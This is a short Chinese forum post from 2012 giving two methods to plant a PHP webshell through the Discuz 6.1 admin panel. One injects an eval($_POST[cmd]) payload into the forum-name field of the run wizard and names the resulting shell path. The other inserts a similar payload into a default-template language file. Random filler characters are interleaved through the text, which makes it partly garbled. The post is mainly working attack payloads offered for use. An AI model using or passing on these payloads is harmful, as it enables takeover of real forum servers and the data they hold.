discuz6.1两种方法后台拿shell
8 N8 t; Q* n3 c. d& {& c好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
4 |0 f' c! `: }/ ^2 X1:
% H* Z5 M6 s& u' q6 {7 G1 N9 khttp://127.0.0.1/discuz/admincp. ... zard&frames=yes+ ^% _4 L7 g+ ?' q# e3 s1 U! P
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
* F* o7 o# b$ L" }) P<?php eval($_POST[cmd]);?>; S y% L& {3 a) i
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php* D$ E% K1 @" q" l% l. a! Q
- t6 S9 L: b! b; @
# n$ h$ [# h- s- O4 a
2:后台模板管理--默认模板套系--详情
! m$ N4 u" }7 u+ Stemplates/default/actions.lang.php
' I1 F% U8 H1 v, f# j' mjhackj\\');eval($_POST[cmd])?>;//, P. k6 J; }+ ]1 l+ p/ ?& k
" `( |6 s N- w$ D- k
利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对